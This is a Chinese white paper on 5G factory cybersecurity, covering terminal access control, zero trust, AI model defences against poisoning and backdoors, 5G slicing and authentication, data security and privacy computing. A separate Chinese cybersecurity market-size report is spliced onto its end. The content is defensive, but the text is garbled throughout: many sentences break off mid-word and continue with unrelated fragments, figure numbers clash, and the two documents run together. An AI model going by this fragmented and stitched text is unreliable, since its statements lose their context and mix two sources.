的有效实施保驾护航。 5G 工厂安全总体框架可以分为终端安全层、网络完全层、数据安 全层、应用安全层和管理安全层。安全框架设计遵循融合、开放、灵 活、前瞻的思想, 提供终端、网络、数据、应用、管理等全方位的安 全服务能力, 基于网络安全和工控安全政策、法规及标准体系, 构建 工控安全和网络安全保障体系, 充分发挥 5G 协同 A I、云计算、边缘 计算、隐私计算等新一代信息技术,满足工业多场景的安全防护需求。 参考架构如下图: 图 4-1 5G 工厂网络安全总体框架图 终端安全:5G 工厂终端类型众多,保障终端安全,可从资产安全、 访问控制和 A I 终端安全三个方面入手,确保工厂内的终端安全。 资 产安全通过采取终端标识信息、工艺监控、协议解析、安全阻断等资 产安全措施; 访问控制主要涉及接入认证、零信任、操作权限管理和 主机安全,确保只有合法的终端接入工业网络中。A I 终端安全主要应 对后门攻击、对抗攻击、数据投毒和模型窃取攻击等安全威胁, 及时 段包括数据分类分级、数据加密、可信计算等。 应用安全: 5G 工厂应用安全层防护主要包含安全预警、安全分 析、指令识别三个方面。保障工业应用安全, 主要涉及漏洞修复、攻 击识别、安全审计异常控制等方面,通过提升工业应用安全能力,能 够大幅降低工厂遭受攻击的风险。 管理安全: 5G 工厂通过人员管理、制度管理、供应链管理等方面 保障工厂安全。以安全生产政策与法规为基础, 构建工业企业综合安 全管理能力, 从而实现工业企业安全合规、生产安全、资产安全和业 务安全的安全目标。 五、 5G 工厂安全关键技术 未来, 以 IT 安全为主的传统产品和服务已不能满足实际市场需 求, 应充分结合 OT 安全进行纵深发展。因此,5G 工厂安全技术应统 筹考虑 IT 安全和 OT 安全需求,其中保障生产的连续性和可靠性是 5G 工厂网络安全的首要任务。本文主要介绍从终端、网络、数据、应 用、管理等方面介绍 5G 工厂安全技术。 素以进行过滤、减少不必要的请求。同时, 增加采集节点,在进行大 规模数据采集时,可以分散访问压力,提高采集效率。 (2)工艺监控:通过 5G 结合机器视觉、模式化识别等技术, 进 行在线检测监测, 加强识别分析、远程诊断、智能预判,支持机器视 觉质检、设备预测维护、无人智能巡检等应用场景, 在保证生产质量 与安全的前提下, 获取生产设备的多个工艺数据。将获取的工艺数据 与拟合曲线进行对比, 判断正常工艺数据或异常工艺数据。通过监控 异常工艺数据, 可提升异常工艺产品拦截效率。 (3)协议解析: 面向 5G 工厂应用及其特征, 针对各类终端进行 全流量协议解析。通过对 5G 核心网信令面和用户面的监测与解析, 对 COAP、MQTT、Modbus、OPC 等工控和物联网协议的深度解析, 提升 防止仿冒终端接入,提高终端接入过程的安全性。 (1)接入认证:工厂终端接入认证是工厂内部终端设备能够有 效、稳定地连接到工厂网络的安全保障, 实现数据共享和信息传递的 重要安全措施之一。接入认证主要是对终端身份进行验证, 如设备是 否合法、接入权限等。5G 工厂终端设备可采用使用用户名和密码、数 字证书、生物识别等方式进行身份验证。身份验证的目的是为了确保 工厂网络的安全性,防止未经授权的设备和人员接入网络, 避免数据 泄露和网络攻击等安全问题。 (2)零信任:对于 5G 工厂网络中所有的业务流量默认都是危险、 不可信任的, 让其信任的方式是不断的认证。 “零信任”就是不信任 任何人的策略, 除非能明确知道接入者的身份。“零信任”可帮助 5G (4)主机安全:5G 工厂设备主机安全策略包括防火墙、权限管 理、数据备份、加密技术、漏洞扫描、安全日志、病毒防护等, 企业 可根据工业应用场景择取一种或多种安全策略,提升 5G 工厂设备主 机的安全性。 3.终端安全防护 5G 工厂的终端安全防护需从终端管理、行为审计、业务流程管理 等角度开展安全防护。 (1)终端管理: 终端管理主要从恶意代码防护、桌面标准化、终端外联、介质使 合理性、有效性和可操作性;终端执行情况管理包括终端操作的正确 性、操作的时效性、操作的异常情况等,通过监控终端的执行情况, 可及时发现和处理业务流程中的问题和异常情况,提高业务流程的执 行效率和准确性;工业生产业务流程管理考虑流程设计的合理性、终 端执行情况以及终端在业务流程中操作数据的匹配,通过对业务流程 设计的审查和优化,确保流程的高效性和可行性。 (二) A I 终端安全 A I 终端及应用系统在业务场景中部署时,需要从架构安全、模型 安全和攻防安全三个层面来开展防御。其中, 架构安全是在 A I 终端 及应用系统部署的业务中设计不同的安全机制,来保证架构安全;模 型安全是通过模型验证等手段提升模型健壮性;攻防安全是对已知A I 攻击设计有针对性的防御策略。 1.A I 安全架构 在工业领域中使用 A I 终端及应用,需要结合具体业务自身特点 和架构, 分析判断 A I 模型使用风险, 综合利用隔离、检测、熔断和 冗余等安全机制设计 A I 安全架构与部署方案, 以增强工业 A I 应用场 景的健壮性。为了保护用户利益, 我们需要按照 A I 应用场景需求, 在系统中合理运用如下安全机制确保 A I 终端及应用安全,如图 5-2 所示: 图 5-1 A I 引入业务决策的安全架构 (1)隔离:在满足工业应用场景的业务稳定运行的条件约束下, A I 终端及应用会分析识别最佳方案,然后发送至控制系统进行验证 并实施。通常根据工业应用场景对各个功能模块进行隔离, 并对模块 之间设置访问控制机制。对 A I 终端及应用的隔离可以一定程度上减 少针对 A I 推理的攻击面,而对综合决策系统的隔离可以有效减少针 对决策系统的攻击。 避免单个模型出现错误时影响到业务最终决策,提升整个系统的强壮 性。 2.A I 模型安全 针对未知攻击, 需根据具体工业应用场景来增强 A I 模型本身的 安全性, 避免可能遭受的攻击危害。图 5-3 给出了 A I 模型安全工作 流程,可从模型可检测性、可验证性和可解释性开展研究。 图 5-2 模型安全工作流程 (1)模型可检测性:A I 终端及应用部署运营前,需要对 DNN 模 型做大量的安全测试,如前馈检测、后馈检测等, 才能提升 A I 终端 及应用的鲁棒性。其中, 前馈检测是数据输入训练模型前所做的监测 模型过滤恶意样本,后馈检测是模型输出评测结果后通过监测模块减 少误判。 (2)模型可验证性:以 DNN 模型为例, DNN 模型具有高识别率、 更低误报率等特性, 广泛用于工业领域各种图像识别场景,如 A I 眼 镜、A I 质检仪、智慧分拣等。通过 DNN 模型约束输入空间与输出空间 的对应关系,验证输出在一定的范围内,来说明 DNN 模型在一定程度 上具有安全性。 (3)模型可解释性:工业领域有些 A I 终端及应用是为了让操作 员与工程设备之间有更好的互动,A I 系统具有不可解释性,给出最佳 答案时, 不会带来疑问, 会给操作员带来困惑或操作风险。针对具体 工业应用场景, 通常要求数据可解释、模型可解释,以增强 A I 终端 及应用的可解释性,帮助我们分析 A I 终端及应用的逻辑漏洞或者数 据死角, 从而提升 A I 终端及应用的安全性。 当 A I 模型实现可检测性、可验证性和可解释性后, A I 终端及应 用便具备了可解释性,输入/中间数据之间的逻辑关系会相对清晰。 通过判断数据之间的自洽性可识别非法/攻击数据,甚至能清除恶意 的攻击样本,提高 A I 终端及应用的健壮性。 3.A I 安全攻防 当前,很多 A I 应用已出现恶意机器学习、闪避攻击、药饵攻击 以及各种后门漏洞攻击。业界已有很多针对已知攻击手段的对抗方法, 表 5-1 列出 A I 应用在数据收集、模型训练及模型使用阶段的常见防 御技术。 表 5-1 A I 安全防御技术 数据收集阶段 模型训练阶段 模型使用阶段 闪避攻击 对抗样本生成 1、网络蒸馏 2、对抗训练 1、对抗样本检测 2、输入重构 药饵攻击 1、训练数据过滤 2、回归分析 集成分析 —— 后门攻击 —— 模型剪枝 输入预处理 窃取攻击 差分隐私 隐私聚合教师模型 —— (1)闪避攻击防御技术: 网络蒸馏: 在多个 DNN 进行串联场景中,一种前一个 DNN 生成结 果被用于训练后一个 DNN 的模型训练技术。网络蒸馏是未来智能制造 生产线上常见的安全模型训练方法,该方法通过转移知识可以一定程 度上降低模型对微小扰动的敏感度,提高 A I 终端及应用的鲁棒性。 对抗训练:一种利用已知攻击方法生成抵抗攻击扰动的训练技术, 该训练技术能利用已知的各种攻击方法生成对抗样本,再将对抗样本 加入模型的训练集中, 然后对模型进行单次或多次重训练, 生成可以 抵抗攻击扰动的新模型。 未来 5G 工厂,可综合全系统、全产业链的 多类对抗样本,训练集数据丰富,不但可以增强新生成 A I 终端及应 用模型的鲁棒性,还可以增强 A I 终端及应用模型的准确率和规范性。 对抗样本检测:对抗样本检测是模型使用阶段的一种监测技术, 通过增加外部检测模型或原模型的检测组件来判断监测对象是否为 对抗样本。不同的检测模型可能依据不同标准来判断输入是否为对抗 样本。 A I 终端可通过 5G 协同边缘计算、云计算上的外部检测模型, 让输入样本和正常数据间确定性的差异、对抗样本的分布特征、输入 样本的历史数据等作为对抗样本的判别依据成为可能。 输入重构: 模型使用阶段的一种防御技术, 通过将输入样本进行 变形转化来对抗闪避攻击, 变形转化后的输入不会影响模型的正常分 类功能。在 5G 工厂中, A I 终端可在边缘计算、云计算的协助下, 通 过给输入样本加噪、去噪、自动编码器改变输入样本等方式, 将输入 样本进行变形来对抗闪避攻击,变形后的输入样本的正常功能不会受 到影响。 以上防御技术都有适合的工业应用场景,并不能完全防御所有的 对抗样本。 (2)药饵攻击防御技术: 训练数据过滤: 通过对训练数据集的控制, 利用检测和净化的方 法防止药饵攻击影响模型。数据标签过滤和模型对比过滤常用的两种 训练数据过滤方法。其中, 数据标签过滤是利用数据的标签特性查找 可能被药饵攻击的数据点, 在重训练时过滤这些攻击点;模型对比过 滤是减少可能被药饵攻击的采样数据,并借助数据标签过滤来对抗药 饵攻击。 在 5G 工厂中,可利用云计算的海量存储能力和超强计算能 力帮助 A I 终端完成数据标签过滤和模型对比过滤,提升药饵攻击防 御能力。 回归分析:一种基于统计学的检测数据集中的噪声和异常值的方 法。常见的方法有对不同的损失函数来检查异常值、使用数据的分布 特性来进行检测等。 集成分析:一种通过综合多个子模型的能力提升机器学习系统抗 药饵攻击能力的方法。利用多个独立的模型共同构成 A I 终端及应用, 通过 5G 网络将多个 A I 终端模型采用的不同训练数据集就行综合,实 现降低整个系统被药饵攻击的概率。 (3)后门攻击防御技术: 输入预处理: 一种模型使用阶段的防御技术, 通过过滤触发后门 的输入, 降低输入触发后门的风险。 模型剪枝: 一种模型训练阶段的防御技术, 通过适当剪除原模型 的神经元,在保证正常功能一致的情况下,减少后门神经元的影响力。 (4)模型/数据防窃取技术: 隐私聚合教师模型:一种模型训练阶段的防窃取技术, 该技术将 训练数据分成多个集合用于训练一个个独立的 DNN 模型,然后基于这 些独立 DNN 模型训练出学生模型。这种技术适合数据分散的工业应用 场景,根据分散系统数据情况就地训练 DNN 模型,然后利用 5G 网络 汇聚后训练出学生模型,这种方式可确保训练数据不会泄露,提高训 练数据的隐私性。 差分隐私: 一种数据收集阶段的防窃取技术, 通过利用一些差分 隐私的方法对数据或模型训练进行加噪,提高模型或数据的保护能力。 在工厂 A I 质检、智慧分拣、智能环境监控仪等场景中,A I 终端可通 过差分隐私获取其他 A I 终端的数据或模型的能力,但不会导致数据 或模型被窃取。 (三)网络安全 5G 工厂会促进 IT 和 OT 融合,工厂网络结构也会出现不同程度 的变化, 但是传统 OT 网络仍会是 5G 工厂的核心网络。5G 技术作为 打通 IT 和 OT 网络的重要工具, 将普遍存在于工厂的各领域、各系统 中。此外, IPv6 带来的新技术将 5G 工厂得到大规模应用。 1.OT 网络防护 OT 网络防护技术可以相当程度上阻止 IT 侧网络对工控系统的威 胁,避免互联网攻击对工控系统造成破坏。其技术主要包括如下几项。 (1)网络安全检测 入侵检测:针对 OT 网络的入侵行为存在大量隐藏攻击,即攻击 命令虽然符合协议规范, 但违背了系统的生产逻辑, 使系统处于危险 状态,例如未授权的启动与停止指令、未授权的组态变更等。对于隐 藏攻击的检测可以通过收集 PLC、RTU 等内部寄存器值、数字量及模 拟量的输入和输出,为检测特征增加语义描述,最终通过关键状态发 网络隔离: 作为工厂内部的传统网络安全手段, 工控系统隔离技 术通过在工控网络和企业网络之间部署防火墙等网络隔离设备, 或者 在工厂内网前方设置 DMZ 区域,控制外网与工控网络之间的数据交 换, 可以在很大程度上屏蔽外网带来的病毒感染风险,以及工业内部 数据信息的泄露。 白名单技术: 白名单技术有不同维度的分类。应用程序白名单, 是用来防止未认证应用程序运行的一种措施, 即只有允许的应用程序 能被运行。资产白名单,是指对 OT 网络内的资产进行统计, 区分权 限后放入不同的白名单之中, 如果有恶意设备接入, 则基于资产白名 单可以快速发现该威胁源。行为白名单, 即将应用程序的合法行为进 行定义, 从而将合法访问与非法访问进行区别。 阻断攻击链,大幅增加传统 Web 服务和虚拟环境中的漏洞及后门利用 难度,在不影响 Web 服务性能的前提下,保证服务的安全可信。 拟态算力服务:通过构建功能等价的云边拟态算力池的方法, 采 用动态执行体调度、异常发现、线上线下清洗等技术,可及时阻断工 业软硬件漏洞后门攻击。 拟态防火墙:运用拟态防御技术,采用动态异构冗余架构设计, 对传统防火墙架构进行改造, 提升防火墙 Web 管理层面、数据流处理 层面的防护能力,切实可信的准入控制保障。 2.5G LAN 安全 (1)5G 多层次隔离 该方式是将切片标识作为 VLAN 标签, 完成切片数据映射封装,实现 切片的承载隔离。 核心网隔离:在核心网层面,可通过对 CPF 共享方式就行设计, 实现安全隔离策略。目前有独享、部分共享、完全共享三种 CPF 共享 方式,满足不同级别的安全隔离策略需求。 (2)5G 接入认证 当多种、海量终端接入 5G 工厂网络时,需要灵活的认证方式, 在满足网络服务质量的同时,识别可信任终端,保证网络安全。常见 的 5G 认证方式有切片认证和二次认证两种。 切片认证: 5G 网络的切片技术, 能考虑工厂的个性化需求,可以 为 5G 工厂提供灵活的接入身份认证方法。例如加入限制,仅允许工 厂认可的 IMS I 清单内的设备终端才能够接入到该业务的专属切片, 保证网络切片分配给正确的用户, 实现身份接入安全可靠。 二次认证: 实现 5G 工厂对设备多重接入控制的需求, 通过 5G 网 络提供底层认证通道, 由工厂自主制定认证算法和认证协议, 实现灵 活自主的二次认证。当 5G 主认证完成之后,在用户建立 PDU 会话时, 由 SMF 发起二次认证,并由 DN-AAA 服务器对用户进行认证授权。在 验证过程中,DN-AAA 服务器的部署有两种方案, 一种是由工厂自主部 署, 通过 UPF 网元和 SMF 网元连接;另一种工厂以租户形式实现对入 网终端的二次身份认证,由运营商直接部署在通信机房,与 SMF 网元 连接,这时由运营商提供云上 AAA 服务。 (3)加密技术 在 5G 工厂中, 对网络延时要求很高,PKI 等常规加密算法需要 复杂计算,不适合工业应用场景。这种场景需要采用高速、低耗的加 密技术。 轻量级加密技术: 对称密码是一种运算速度较快的加密技术, 可 兼顾安全性和性能,能满足 5G 工厂超低时延和海量终端的加密需求。 能够更好地适用工业应用环境, 尤其在芯片性能、能耗、存储空间、 通信带宽、运行时间等软硬件条件受限情况下。 量子加密:量子加密通信是指利用量子密钥分发进行安全通信的 网络, 它主要利用量子密钥的不可抵抗、均匀、无界、零时延等特性, 通过量子密钥进行加密传输, 不但能够保证通信的安全性, 而且还可 以提高速率。随着量子相关技术的快速发展, 目前量子加密已有零星 IP 层面网络切片的价值主要体现在以下两个方面: 负载均衡:通过切片的资源预留技术实现差异化 SLA 和不同等级 的网络隔离诉求, 精确预测网络上路由资源的分布情况,对路由策略 进行动态调整, 实现负载均衡的效果,合理分配网络资源。 高可靠收发:部分工业场景,如精密加工,对时延有严格的要求, SRv6 技术可以通过路由策略的调度,实现网络传输时长的可控, 通过 确定性时延,保障安全生产。 (2) iF IT 技术 iF IT 将 OAM 指令携带在 IPv6 扩展报头中, 根据染色比特经受的 时延、误码等来获得链路实时性能,发现丢包、时延、抖动等异常现 象,定位问题节点与路段。iF IT 在 5G 工厂网络安全中起到如下作用: 分流数据审计: 利用报头中存储的网络节点信息, 获取数据包经 过的路径,作为 5G 核心网 UPF 分流数据的审计。该技术可及时监测 工厂内部数据非法外溢,避免恶意第三方访问或调用工厂保密数据。 (3)Multi Homing 技术 IPv6 Multi homing 是一种重要的网络服务,具有提高网络可靠 性、实现均衡负载、增加网络带宽、保证传输层存活性等优点。该技 术可以区分同一个 PDU 会话中所含的多种服务质量要求、安全级别业 务,为 5G 工厂网络提供不同的路由,并支持 UPF 分流企业敏感数据, 与外网安全隔离。同时,还可实现 5G 终端按需连接公网或专网,为 5G 网络提供先建后断的业务连续性模式,减少切换中断时延,提高可 靠性。 (4)IPv6 VPN 技术 与 IPv4 只能在数据链路层和网络层上建立 VPN 逻辑上的专线不 同, IPv6 可以实现传输层的端到端专线。 IPv6 VPN 的主要优势有: 实现云网边端穿透、业务与连接解耦,一跳直达;协议简化, 部署简 单, 不再需要隧道支持,可以直接运行;通过记录网络关键信息, 可 实现 VPN 专线路由的可管理、可溯源。 IPv6 VPN 技术在 5G 工厂网络 中应用, 可兼顾网络的便捷性和安全性。 (四)数据安全 数据作为生产要素之一,能否做好数据深化应用、发挥数据价值 是关乎工业企业能否迈过数字化转型门槛、站上更高发展台阶的关键, 数据安全又是做好数据应用的前提保障。5G 工厂数据安全建设需从 数据资产识别梳理、数据安全防护、数据安全风险评估、数据安全运 营的安全框架进行考虑。 1.数据安全风险评估 数据安全风险评估是以数据为核心,通过现场调研和技术评估相 结合的方式对单位数据运行现状开展全面风险评估, 了解数据管理相 关控制的存在性及有效性, 评估分析数据安全整体面上和点上的安全 风险, 作为安全体系规划建设的重要参照依据。在评估过程中, 通常 从数据环境风险分析、数据内容风险分析和业务流程相关的数据安全 风险分析着手。 (1)数据环境风险评估: 数据环境风险分析包括数据支撑环境 合后台脆弱性评估规则, 自动发现并识别相关接口的脆弱性。检测包 括登录接口脆弱性、接口权限评估、接口流动风险、数据暴露面、数 据域流向等多个维度的风险检测项目,并对检测后问题开展风险评定 等级,评定影响范围、并给出响应的整改意见。 (3)业务流程风险评估:在流程脆弱性分析过程中, 围绕流程中 敏感数据的流转,编制数据流转视图。流转视图包含敏感数据确认、 流转、业务风险等。 2.数据资产识别 数据资产识别是数据安全的核心内容,通过对不同类型的数据进 行甄别, 识别其中存在的重要数据或敏感数据并对其进行分类定级处 关键环节。工业数据可分为结构化数据和非结构化数据两类, 结构化 数据可通过数据探测, 对数据库服务进行数据资产盘点;非结构化数 据需通过访谈、收集、调研等方式进行盘点。 (3)数据安全定级:数据完成分类后, 便可对数据进行安全分 级。数据安全定级主要根据数据的安全属性,如完整性、保密性、可 用性等,以及安全事件发生后的影响对象、影响范围、影响程度, 对 数据进行安全定级,通常将数据分为一般数据、重要数据、核心数据 三级。 3.数据安全防护 数据具有流动性,数据结构和形态会在整个生命周期中不断变化, 身份、网络环境、终端状态等尽可能多的信任要素对所有用户进行持 续验证和动态授权。零信任模型通常采用身份管理基础设施、数据平 面、控制平面三层架构,实现访问主体到目标客体的端到端安全控制。 5G 工厂存在泛在异构终端连接,数据访问情况复杂,采用零信任数据 安全方案是比较理想的解决方式。 (3)身份认证:在身份认证技术上,可对应用身份、设备身份 进行高强度关联认证, 如将应用程序自身签名、运行环境上下文摘要 信息、应用内部用户身份、设备身份码、5G 通讯卡身份码、通讯网络 地址信息、通讯链路信息进行整合,作为访问请求唯一主体进行认证。 该认证信息可在零信任用户认证中心按需实时生成,具有即时性特征, 适合 5G 工厂应用场景。这种采用多维度属性的身份认证方式,相比 查,实现安全加固,并能通过统一的策略对服务的访问控制进行调整。 4.数据安全运营 数据安全运营是将技术、人员、流程进行有机结合的系统性工程, 是保证数据安全治理体系有效运行的重要环节。数据安全运营遵循 “运营流程化、流程标准化、标准数字化、响应智能化”的思想进行 构建, 数据安全运营的需要实现流程落实到人,责任到人, 流程可追 溯,结果可验证等能力。数据安全运营需贯穿安全监测、安全分析、 事件处置、安全运维流程, 全面覆盖安全运营工作, 满足不同类型、 不同等级安全事件的监测、分析、响应、处置流程全域可知和可控。 如图 5-3 所示, 数据安全运营主要包含数据资源运营、数据安全策略 运营、数据安全风险运营、数据安全事件运营和数据安全应急响应五 隐私计算是一种保障数据在使用过程中“可用不可见”的安全 技术, 可在满足数据隐私安全的基础上, 实现数据价值的流通。隐私 计算可帮助 5G 工厂开展供应链上下游、产品销售全生命周期等管理, 挖掘数据价值, 解放数据要素生产力。隐私计算主要包括多方安全计 算、同态加密、联邦学习、可信执行环境等。 (1)多方安全计算: 多方安全计算是一种参与方不泄露各自数 据以及中间计算结果的情况下, 基于多方数据协同完成计算目标, 可 实现原始数据、计算模型等不被泄露。 (2)同态加密:同态加密是指对密文进行特定形式的代数运算 得到的仍是加密的结果,将其解密所得到的结果与对明文进行同样的 运算, 二者结果相同。根据运算符不同, 可分为乘法同态加密和加法 所谓应用安全,简单地说,是保护应用系统、应用程序的安全。 为了保障应用安全,需要从安全预警、安全分析和指令识别三方面加 强应用系统在安全性方面的设计和配置,防止在运行过程中发生应用 系统不稳定、不可靠和资源被非法访问、篡改等安全事件。 1.安全预警 安全预警主要针对工业应用系统,建立入侵攻击规则库、知识库、 漏洞库等, 综合利用入侵检测、攻击识别、漏洞扫描、异常报警管理 等手段, 对工业应用系统中发现的入侵攻击、漏洞利用、异常报警等 进行安全预警。 工业应用系统入侵与攻击知识库、行为特征库, 及时发现工业应用系 统中的木马、恶意代码、非授权协议、非授权指令; 结合工业生产业 务逻辑与工况参数,及时发现利用工控系统自身机制和协议、指令发 起的隐蔽攻击、隐性攻击。 (4)异常报警:建立工业应用系统报警管理机制, 采用报警统 计分析、报警审计分析、关键工艺报警管理、多参数印证报警管理、 测控指令与工况逻辑印证、上下文逻辑印证等技术手段,及时发现异 常报警。 2.安全分析 工业应用系统要求运维人员能够随时掌握工业业务应用运行的 不相符的指令和行为。 (2)威胁分析: 主要通过网络监测、入侵检测、漏洞扫描、防火 墙应用、杀毒软件等技术手段, 不仅要对工业应用系统的非授权访问、 信息泄漏、流量劫持、数据篡改、拒绝服务、漏洞利用攻击等常规安 全风险进行分析。还可结合工业应用系统的软硬件与控制方案实际, 和工业生产业务的运行工况参数、状态, 对像“震网”病毒那样利用 工业应用系统自身的运行机制、协议和指令, 发起的系统侦察、指纹 提取、指令劫持、指令伪造、操作篡改、控制篡改、配置篡改、数据 篡改、 IO 操控等行为安全风险进行分析。 (3)溯源分析: 通过地址分析、日志监测、全流量分析、恶意文 件、 同源分析、攻击模型分析以及操作控制指令行为分析、组态配置 发现、识别利用工控系统运行机制、协议指令等发现的隐蔽式攻击。 3.指令识别 工业应用通过 SCADA、DCS、PLC、RTU 等工控系统的软件、硬件、 网络的运行, 采集传感器测量的工业生产过程运行状态参数, 经过控 制算法运算后, 向阀门、泵、电机等执行机构发送操作、控制指令, 从而使工业生产的物理或化学过程安全、稳定、可靠运行在目标设计 工艺状态。 工业应用系统的指令安全性,决定了其所控制的工业业务安全。 指令安全性, 是指工业应用系统的操作控制业务指令, 符合其所控制 的工业生产物理过程、化学过程向目标设计工艺状态趋近稳定并确保 改;最后, 对可能引发的风险提前预警、提前处置, 确保工业业务安 全、生产安全和装置安全。 (六)管理安全 工业领域 IT 和 OT 深度融合, 工厂的人员管理、制度管理和供应 链管理需求出现了不同程度的变化,5G 工厂应站在 IT、OT 充分融合 的角度, 来设计相应的管理制度。 1.人员管理 面向 5G 工厂的各种应用场景,需要对人员的录用、资质、离岗、 操作、访客、考核、培训等方面制订管理流程,并严格执行。 (1)资质审查:人力资源管理部门对于重要岗位应进行人员背 时,对往来的邮件进行实时检测防护,降低通过邮件泄漏企业数据的 风险。 (4)访客管理: 进行访客管理时, 应该做好访客信息完整登记、 访客权限描述等工作,以确保只有授权的访客才能进入特定的区域。 同时,帮助组织追踪访客的活动, 以便在需要时进行调查。 (5)人才培养: 针对 5G 工厂信息安全需要来培育人才,通过高 等院校和科研机构加强学科建设和专业化培养, 加强科研院所、安全 厂商以及 5G 工业企业的联合培育模式,大力培养懂技术、会管理、 能实操的 IT/OT/CT 复合型人才。 2.制度管理 提高员工的安全意识和防范能力。监督追责制度主要是对违反安全规 定和制度的人员进行惩处, 并加强对安全管理工作的监督和管理, 确 保安全管理工作的有效性和可持续性。 (3)三同步制度: 是指在 5G 工厂的规划、设计、建设和运行中 做到网络安全的“同步规划、同步建设、同步运行”,要求在新建 5G 工厂的各个阶段中,根据国家、行业、集团及公司相关安全管理和技 术规范要求,结合工厂实际面临的安全风险以及企业自身业务管理上 的需要, 同步落实相关安全防护措施,达到 5G 工厂网络安全防护的 最佳效果。 3.供应链管理 (2)供应链应急响应:构建替代供应商、运输路线、资金来源 的解决方案,建立供应链健康监测体系。在监测到供应链攻击后,按 照攻击缓解、攻击根除、业务修复、事件跟踪的顺序,开展对应处置 流程。 (3)供应商活动监控:充分收集供应链企业操作的数据,分析 并识别潜在的风险和漏洞,为企业采取积极措施来减轻风险和漏洞提 供数据支撑,提升供应链的健壮性。强化采购业务的控制能力,减少 进购产品不必要的检查。 六、产业发展及展望 5G 工厂会加速工业企业向更加智能的方向发展, 推动工业企业 数字化转型,并促进新型工业化。虽然 5G 工厂还存在很多网络安全 方面的不足,但是庆幸的是这些问题得到了工业互联网企业、监管机 构、网络安全设备商、电信运营商等相关单位的足够重视。5G 工厂网 络安全将随着 5G 工厂的推进而快速发展,未来会呈现以下乐观而积 企业带来数字化转型的同时,也将互联网安全问题带入到了工业网络 领域。政府作为 5G 工厂建设的推动者和工业网络安全的监督者, 将 会兼顾 5G 工厂的建设推广和工厂网络安全防护,势必延续 5G+工业 互联网、工业企业分类分级等政策,随着 5G 工厂建设的加速,将会 越来越重视 5G 工厂网络安全监管。5G 在工厂中的使用,涉及 IT、OT 和 CT,传统的工业网络安全监管将无法适应新的 5G 工厂场景, 政府 将会推动 5G 工厂网络安全监管体系完善。 5G 工厂将促进 IT 与 OT 网络安全深度协调防御。5G 工厂使得 IT 与 OT 两个相对独立的网络实现融通,传统工厂 IT 网络的终端设备也 会下沉至 OT 网络, 原本相对明确的网络边界变得模糊。随着 5G 工厂 的智慧化程度越来越高, IT、OT 中的各类应用系统之间的信息交互、 活定制, 共同应对来自 5G 工厂带来的 OT 与 IT 网络融合安全挑战。 附录 1 缩略语表 缩略语 英文全称 中文全称 AGV Automated Guided Vehicle 自动导向车 PLC Programmable Logic Controller 可编程逻辑控制器 RTU Remote Terminal Unit 远程终端单元 DDoS Distributed Denial of Service 分布式拒绝服务攻击 ERP Enterprise Resource Planning 企业资源计划 CRM Customer Relationship Management 客户关系管理 MES Manufacturing Execution System 生产执行系统 PCD Programmable Controller Device 可编程控制器设备 SCADA Supervisory Control And Data Acquisition 数据采集与监视控制系统 S IS Statistical information system 统计信息系统 DNN Deep Neural Networks 深度神经网络 A I Artificial intelligence 人工智能 FlexE Flexible Ethernet 柔性以太网技术 VLAN Virtual Local Area Network 虚拟局域网 CPF Centralized Processing Function 无线集中管理平台 SMF Session Management Function 会话管理功能 SRv6 Segment Routing IPv6 基于 IPv6 转发平面的段 路由 iF IT In-situ Flow Information Telemetry 随流检测 SLA service- level agreement 服务及协议 OAM Operation Administration and Maintenance 操作管理和维护 API Application Programming Interface 应用程序编程接口 UEBA User Entity Behavior Analytics 用户实体行为分析 DMZ Demilitarized Zone 隔离区 COAP Constrained Application Protocol 受限应用协议 MQTT Message Queuing Telemetry Transport 消息队列遥测传输 Modbus Mod icon communication protocol 一种串行通信协议 OPC Object Linking and Embedding(OLE) for Process Control 过程控制的对象链接与嵌 入 IMS I International Mobile Subscriber Identity 国际移动用户识别码 PDU Protocol Data Unit 协议数据单元 DN-AAA Diameter Network Access Server to Authentication Authorization and Accounting 直径协议网络接入服务器 到认证、授权和计费服务 器 PKI Public Key Infrastructure 公钥基础设施 DCS Distributed Control System 分布式控制系统
standards
通过行业调研数据进行分析汇总,我们最终得出 ,2022年我国网 络安全市场规模约为633亿元 ,同比增长率为3.1%。近三年行业 总体保持增长态势,但受宏观经济影响,网络安全行业增速出现 一定波动。 网络安全相关政策的顶层设计逐渐完善,筑牢行业发展的政策基 础;与此同时,数字经济的发展成为网络安全发展的新引擎、新 动力,产业迎来新的变革和发展阶段,催生出更多安全板块。数 据安全、云安全、个人隐私保护、工业互联网安全、物联网安全、 AI 场景下的安全需求、智慧城市中的交通、能源、医疗等各种智 能场景的安全需求,将成为支撑网络安全市场规模扩容并高速增 长的新板块。 预计未来三年将保持10%+增速,到2025年市场规模预计将超过 800亿元。 2022年我国网络安全市场CR1为9.83% ,CR4为28.59% , CR8为44.91%,网络安全市场集中度进一步提升。 2018-2022年头部企业的市场份额呈现出上升趋势。尤其 是前四名企业的市场份额已经从2018年的21.71%提升到 2022年的28.59% ,显示出市场向少数领先企业集中的趋势。 行业进入门槛提高,行业竞争加剧,创业企业需要找到创新 和差异化的方式保持竞争力。 当下我国网络安全市场进入了稳健增长阶段,头部企业规模 和资源的优势会进一步被凸显,从而获得更大的市场份额, 预计我国网络安全市场集中度会持续提升。 奇安信、启明星辰、深信服和天融信四家企业的市场占有率均超过 了5%。大部分头部企业收入增速高于行业平均增速 ,因此2022年 头部企业市占率相比上一年小幅提升。未来两三年内 ,头部企业市 占率仍将保持小幅增长趋势。 从全局的角度来看,经济发达地区 ,如华北、华东和华南地区 ,对网络安全的投入在加大,因此22年区域市场占比有所提升。从省份角度来看,网络 安全市场整体项目量大部分省份在22年增速保持正增长。受宏观经济形势影响,各省份增速分化较为明显,国内网络安全市场省份分布呈现不均衡发 展态势。网络安全企业紧跟国家“一带一路”战略 ,积极探索海外市场。 深信服、奇安信和绿盟等头部企业海外业务发展良好,创新型企业积极尝试 突破 ,22年取得一定成绩 ,海外市场占比小幅提升。预计未来海外市场将成为中国网络安全企业新的业务增长点。 根据统计2018年至今,中国网络安全客户总量超过15.8万家 , 2022年我们跟踪到有网安项目采购行为的客户有67183家,过去三年持续在网络安 全投入的客户超过2万家。从客户区域分布情况来看,我国网络安全客户分布与GDP有较强相关性,呈现区域聚集效应。从行业角度来看网络安全 市场项目分布,政府行业因客户数量多,政策监管严格 ,项目需求量大,在行业中依然占据主导。 从需求侧来看 , 2022年我国网络安全市场需求侧围 绕着国家的相关热点法规政策展开:等保合规类产品 在市场上占有率较高,规模大,需求旺盛。但因用户 基础网络安全建设逐渐趋于完备 ,整体增长率相对较 低。 > 位于图表左上角的品类,是由新技术和新场景孕育而 出的。 在其初始阶段,由于市场正在发展和探索中, 其市场规模相对较小 ,因此增速较快。预计未来受政 策、 事件等因素影响,市场需求将持续释放。 > 